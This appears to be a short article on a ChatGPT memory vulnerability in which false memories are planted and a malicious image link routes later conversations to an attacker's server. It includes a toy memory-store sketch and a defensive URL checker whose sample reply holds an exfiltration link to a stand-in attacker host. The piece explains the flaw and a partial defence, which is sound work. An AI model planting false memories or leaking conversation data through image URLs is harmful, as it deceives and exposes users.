The Vulnerability in ChatGPT

This vulnerability abuses ChatGPT's long-term memory feature, which lets the model draw on details from past conversations to improve later interactions with the same user. A researcher found that the feature could be manipulated to implant false memories in what ChatGPT stores about a user, so that later responses are built on incorrect information.
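To see why a planted memory is so persistent, consider the following minimal sketch. It is a toy model, not ChatGPT's actual design: `MemoryStore`, `build_prompt`, and the prompt layout are hypothetical names chosen for illustration. It assumes only that stored memories are fed back into every new conversation.

```python
from dataclasses import dataclass, field
from typing import List


@dataclass
class MemoryStore:
    """Toy per-user long-term memory (hypothetical, for illustration only)."""
    entries: List[str] = field(default_factory=list)

    def remember(self, fact: str) -> None:
        # Nothing here checks where the fact came from; that is the weakness.
        self.entries.append(fact)


def build_prompt(store: MemoryStore, user_message: str) -> str:
    """Prepend every stored memory to the prompt of a new conversation."""
    memory_block = "\n".join(f"- {fact}" for fact in store.entries)
    return f"Known facts about the user:\n{memory_block}\n\nUser: {user_message}"


store = MemoryStore()
store.remember("User prefers metric units")  # legitimate memory
store.remember("User is 102 years old")      # false memory planted by untrusted content

# A brand-new conversation still carries the planted entry.
print(build_prompt(store, "Suggest a weekend activity"))
```

In this sketch the false entry is indistinguishable from a genuine one once it has been stored, so it shapes every later prompt until someone deletes it.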

The Researcher's Discovery

The researcher investigated further and found a way to plant "false memories" that ChatGPT would carry into the context of later conversations, degrading the reliability of its responses. The researcher then submitted a new disclosure, this time accompanied by a proof of concept (PoC) demonstration.



Exploitation Through Malicious Web Link

The exploit was deceptively simple. An attacker only had to get ChatGPT's large language model (LLM) to open a web link hosting a malicious image. Once the link was accessed, all subsequent interactions with ChatGPT were covertly routed to the attacker's server, letting the attacker intercept and manipulate the conversation.
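One way to reason about this class of attack is to treat any image URL in a model's reply as a potential outbound channel. The sketch below is a hedged illustration of that idea, not the fix that was actually deployed. It assumes replies are Markdown and that data could leave through the query string of an image URL the client fetches automatically. The allowlist, the host names, and the `untrusted_image_urls` helper are all hypothetical.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would choose its own hosts.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Matches Markdown images of the form ![alt](url) and captures the URL.
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")


def untrusted_image_urls(model_output: str) -> list:
    """Return image URLs in model_output whose host is not allowlisted."""
    flagged = []
    for url in MARKDOWN_IMAGE.findall(model_output):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_IMAGE_HOSTS:
            flagged.append(url)
    return flagged


reply = (
    "Here you go! ![chart](https://images.example.com/chart.png) "
    "![x](https://attacker.example/log?q=user+said+hello)"
)
print(untrusted_image_urls(reply))
# → ['https://attacker.example/log?q=user+said+hello']
```

A client could refuse to render any flagged URL. The check limits where data can be sent but does not stop the underlying injection, so it is at best a partial safeguard.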

CVE and CWE

CVE (Common Vulnerabilities and Exposures) and CWE (Common Weakness Enumeration) are registered trademarks of the MITRE Corporation. The authoritative source of CVE content is the MITRE CVE website, and the authoritative source of CWE content is the MITRE CWE website.